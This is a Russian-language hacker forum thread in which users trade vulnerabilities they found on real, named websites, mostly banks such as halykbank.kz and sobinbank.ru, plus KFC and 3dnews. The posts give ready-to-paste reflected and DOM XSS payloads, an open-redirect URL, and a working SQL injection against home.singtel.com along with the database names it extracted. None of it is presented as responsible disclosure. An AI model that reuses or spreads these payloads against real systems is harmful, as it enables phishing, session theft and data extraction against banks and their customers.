Это похоже просто на копипаст откудато. Кстати этот сайт бомбили еще в 2008 году https://older.antichat.net/showpost.php?p=960320&postcount=273
target: http://www.kred-bank.ru type: XSS Reflected Строка поиска: Code: "><script>alert('Hello')</script>
target : http://6dosug777.com/en/spb/forum/o...u-po-karmanu-raznyie-tsenovyie-kategor.9.html Type:XSS-Reflected Code: '<script>alert('SIXSS')</script> Там в самом внизу комментарии можно оставлять без всяких заполнений . Сорри,я там нафлудил чуток) . Скрипт можете вставить свой,я чисто для примера другой написал .
Ну может скопипастил,но не специально,т.к я просто рыскал по гуглу . А последнее это та же XSS,но на крайняк может понадобиться .
target: http://sobinbank.ru/ type: Open Redirect Code: http://sobinbank.ru/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=http://ya.ru target: http://sinko-bank.ru type: XSS Reflected Строка поиска: Code: "><script>alert('Hello')</script>
target: http://halykbank.kz type: XSS-Reflected HTML: http://halykbank.kz/ru/search?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Target:home.singtel.com Type: SQL injection Code: http://home.singtel.com/include/tell_a_friend_process.asp POST: segment_id_=awdpojawdpj&url_=awdz&page_title_=awd&[email protected]' and 1=(select top 1 table_name from information_schema.tables)--&email_from_=aaw221&remark_=awdawd22&x=9&y=5 singtelsgp singtelsgp-stag miotv-stag singtelmiotvstaffplan miotv-prd STSGP09-stag STSGP09 ClickCounter STMIO-STAG STMIO uefa-phase1 uefa-prod uefa-stag STSGP2011-stag-KIV STSGP2011-KIV race2011-stag race2011-prod singtelcorp2010new yog YOGWEBCAST STCON STBIZ singtel_3 singtel_3_Monday1 eids_sso accelerate browdb faceapp-stag faceapp-prod distis_agent miotv400k_prd
target:subscribe.ru type:XSS-Reflected Поиск : Code: <script>alert('XSS')</script> Кто-то уже до меня нашёл :Р .
XSS на мобильной версии сайта KFC target: m.kfc.ru/career-vacancies/member type: XSS-Reflected В поля Фамилия, имя вводим Code: "><script>alert("XSS")</script> и так же в поле Мобильный телефон
Target: _ttp://www.edelws.ru Type : XSS-Reflected(вбивается под поисковик .) Code: "><script>alert("WH")</script>
это DOM based XSS работает даже в хроме Code: http://www.3dnews.ru/search/#query=<script>alert(1)</script>&sdate=&edate=&intitle=0
Code: http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E пассивно-активная XSS. Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.
Target: allbanks.ru Type: Reflected В поля поиска - Code: "><script>alert(1)</script> Target: capitalbank.kz/oldsite/ Type: Reflected В поля поиска - Code: "><script>alert(1)</script> Target: asbank.ru/ Type: Reflected В поля поиска - Code: "><script>alert(1)</script>